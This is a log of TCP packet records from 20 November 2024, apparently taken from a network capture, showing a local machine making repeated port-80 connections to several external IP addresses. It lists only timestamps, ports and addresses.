Nov 20, 2024 04:20:26.665100098 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665137053 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665169954 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665186882 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.665204048 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665241003 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665257931 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.665270090 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665303946 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665335894 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.665340900 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.670286894 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.670324087 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.670336962 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.670373917 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.670403004 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.673120975 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.752101898 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.752144098 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.752197981 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.753123999 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:27.517194986 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:28.537127018 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:28.542196035 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:28.545214891 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:28.553133965 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:28.558115959 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.165998936 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166042089 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166073084 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166105032 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166138887 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166136026 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.166177034 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166202068 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.166210890 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166220903 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.166244984 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166280031 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166282892 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.166307926 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.166344881 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.171353102 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.171407938 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.171441078 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.171473980 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.171674967 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.171715975 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.171746016 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.220191002 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.256587982 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.256623983 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.256661892 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:29.256706953 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.256737947 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.259412050 CET	64851	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:29.264298916 CET	80	64851	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:34.795376062 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:34.800360918 CET	80	64852	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:34.807126045 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:34.815354109 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:34.820255995 CET	80	64852	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:35.410223007 CET	80	64852	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:35.410264969 CET	80	64852	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:35.410298109 CET	80	64852	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:35.410342932 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:35.410343885 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:36.329629898 CET	64852	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:37.347918034 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:37.353132010 CET	80	64853	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:37.353224039 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:37.366869926 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:37.371927023 CET	80	64853	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:37.960627079 CET	80	64853	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:37.960681915 CET	80	64853	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:37.960721970 CET	80	64853	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:37.960758924 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:37.960829020 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:38.876519918 CET	64853	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:39.897008896 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:39.902132988 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.902205944 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:39.918199062 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:39.923141003 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923156023 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923177958 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923191071 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923202991 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923355103 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923367023 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923381090 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:39.923393011 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:40.505414963 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:40.505465984 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:40.505506992 CET	80	64854	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:40.505543947 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:40.505625010 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:41.423434019 CET	64854	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:42.441682100 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:42.446814060 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:42.449183941 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:42.457138062 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:42.462125063 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:43.056360006 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:43.056408882 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:43.056447029 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:43.056478024 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:43.056524038 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:43.057154894 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:43.061137915 CET	64855	80	192.168.2.4	161.97.168.245
Nov 20, 2024 04:20:43.066087008 CET	80	64855	161.97.168.245	192.168.2.4
Nov 20, 2024 04:20:48.127680063 CET	64856	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:48.132803917 CET	80	64856	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:48.133275032 CET	64856	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:48.148305893 CET	64856	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:48.153297901 CET	80	64856	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:48.772876978 CET	80	64856	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:48.772919893 CET	80	64856	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:48.773235083 CET	64856	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:49.657834053 CET	64856	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:50.677567005 CET	64857	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:50.682678938 CET	80	64857	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:50.682799101 CET	64857	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:50.699919939 CET	64857	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:50.704816103 CET	80	64857	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:51.364909887 CET	80	64857	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:51.364938974 CET	80	64857	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:51.364974022 CET	64857	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:52.205183029 CET	64857	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:53.223855019 CET	64858	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:53.228984118 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.229072094 CET	64858	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:53.245126009 CET	64858	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:53.250122070 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250154972 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250168085 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250180006 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250191927 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250319958 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250332117 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250344992 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.250356913 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.865087986 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.865154982 CET	80	64858	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:53.865220070 CET	64858	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:54.753159046 CET	64858	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:55.771059990 CET	64859	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:55.776154041 CET	80	64859	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:55.776232958 CET	64859	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:55.787776947 CET	64859	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:55.792648077 CET	80	64859	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:56.417972088 CET	80	64859	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:56.418030024 CET	80	64859	81.2.196.19	192.168.2.4
Nov 20, 2024 04:20:56.421412945 CET	64859	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:56.424184084 CET	64859	80	192.168.2.4	81.2.196.19
Nov 20, 2024 04:20:56.429169893 CET	80	64859	81.2.196.19	192.168.2.4
Nov 20, 2024 04:21:01.492703915 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:01.497735023 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:01.497821093 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:01.515392065 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:01.520394087 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:02.027595997 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:02.027654886 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:02.027709961 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:02.028090954 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:02.028150082 CET	80	64860	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:02.028201103 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:03.017215014 CET	64860	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:04.035546064 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:04.040766954 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.040898085 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:04.053035021 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:04.058204889 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.683798075 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.683851004 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.683892012 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.683924913 CET	80	64861	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:04.683991909 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:04.684091091 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:05.564052105 CET	64861	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:06.583513975 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:06.589186907 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.591712952 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:06.607306004 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:06.612493038 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612528086 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612555981 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612582922 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612608910 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612643957 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612739086 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612766981 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:06.612795115 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:07.141448021 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:07.141499043 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:07.141541004 CET	80	64862	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:07.141571999 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:07.141654968 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:08.111373901 CET	64862	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.129427910 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.134648085 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.134748936 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.144798994 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.149717093 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.722959042 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.723014116 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.723052979 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.723086119 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.724004984 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:09.724071980 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.744200945 CET	64863	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:09.749375105 CET	80	64863	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:15.240160942 CET	64864	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:15.245182991 CET	80	64864	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:15.245254040 CET	64864	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:15.269378901 CET	64864	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:15.274348974 CET	80	64864	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:16.119029999 CET	80	64864	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:16.119087934 CET	80	64864	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:16.119139910 CET	64864	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:16.785183907 CET	64864	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:17.803157091 CET	64865	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:17.808512926 CET	80	64865	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:17.808608055 CET	64865	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:17.825952053 CET	64865	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:17.830969095 CET	80	64865	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:18.676577091 CET	80	64865	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:18.676606894 CET	80	64865	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:18.676697969 CET	64865	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:19.329711914 CET	64865	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:20.351497889 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:20.356669903 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.363369942 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:20.375401020 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:20.380386114 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380440950 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380472898 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380568981 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380597115 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380677938 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380705118 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380758047 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:20.380785942 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:21.331279039 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:21.376533031 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:21.456604004 CET	80	64866	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:21.456660032 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:21.876585960 CET	64866	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:22.895571947 CET	64867	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:22.900763035 CET	80	64867	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:22.900911093 CET	64867	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:22.911297083 CET	64867	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:22.916204929 CET	80	64867	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:23.782883883 CET	80	64867	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:23.782943964 CET	80	64867	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:23.783040047 CET	64867	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:23.785744905 CET	64867	80	192.168.2.4	206.238.89.119
Nov 20, 2024 04:21:23.790766954 CET	80	64867	206.238.89.119	192.168.2.4
Nov 20, 2024 04:21:29.053183079 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.058228970 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.061261892 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.077188015 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.082287073 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573220015 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573288918 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573335886 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573342085 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.573380947 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573421955 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.573429108 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573471069 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573514938 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573520899 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.573558092 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573601007 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573606014 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.573647022 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.573692083 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.578654051 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.578739882 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.578785896 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.591820002 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.591870070 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.591913939 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.660099030 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.660151005 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.660195112 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.660203934 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:29.660228014 CET	80	64868	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:29.660278082 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:30.579858065 CET	64868	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:31.598601103 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:31.603709936 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:31.603776932 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:31.618158102 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:31.623168945 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152026892 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152115107 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152151108 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152175903 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.152187109 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152220964 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152225018 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.152254105 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152286053 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.152287006 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152314901 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152345896 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152349949 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.152379990 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.152420044 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.157351017 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.157409906 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.157443047 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.157453060 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.157478094 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.157516003 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.170542002 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.170598984 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.173865080 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.244251013 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.244282961 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.244334936 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.244369030 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.244524002 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:32.248989105 CET	80	64869	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:32.253170967 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:33.131365061 CET	64869	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.145114899 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.150347948 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.150428057 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.164470911 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.169459105 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169517994 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169547081 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169635057 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169661999 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169790030 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169817924 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.169845104 CET	80	64870	216.40.34.41	192.168.2.4
